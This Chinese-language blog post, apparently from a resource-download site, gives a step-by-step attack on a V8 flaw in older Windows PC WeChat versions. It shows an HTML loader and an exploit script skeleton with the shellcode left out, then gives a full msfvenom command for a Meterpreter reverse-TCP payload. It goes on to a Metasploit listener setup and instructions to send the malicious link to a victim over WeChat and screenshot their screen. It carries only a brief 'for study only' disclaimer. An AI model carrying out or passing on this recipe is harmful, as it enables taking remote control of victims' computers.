本站vip特权 - 全站资源免费下载

限时特惠

高危微信漏洞,点击链接可被黑客完全控制

仅供学习,干坏事一概不负责!!!

根据腾讯安全中心的公告,这是因为chrome浏览器使用的V8引擎存在安全问题导致的。该漏洞仅影响windows版本的PC版微信,且只影响3.2.1.141以下版本。
u=2869398199,1478601235&fm=11&gp=0.jpg
1、漏洞利用的html,通过html调用JavaScript

<script src = "https://www.freebuf.com/vuls/wa.js"></script>

2、wa.js 这里就不展示恶意部分了

ENABLE_LOG = true;
IN_WORKER = true;
var shellcode = [ ]
·
·
·
try{
    print("start running");
    trigger();
}catch(e){
    print(e);
}

3、使用Kali自带的msfvenom生成反弹木马,并将生成十六进制添加到上面代码的shellcode中

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.65 lport=9999 -f csharp

1.PNG
4、再使用metersploit监听端口,设置本地ip和本地监听端口
2.PNG
5、再使用python开发web服务器
3.PNG
6、将恶意链接发送到微信,并用微信点击打开
4.PNG
7、此时受害者就已经中招了,可以使用screenshot命令获取受害者PC当前画面的截图,可以想做什么就做什么了
5.PNG

PC端微信快升级到最新版本!!!

u=1301411739,844423148&fm=26&gp=0.jpg

漏洞

weblogic cve捡漏指南

2021-5-9 12:00:36

漏洞

Apache HTTPD 换行解析漏洞分析与复现(CVE-2017-15715)

2021-5-10 11:54:05

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索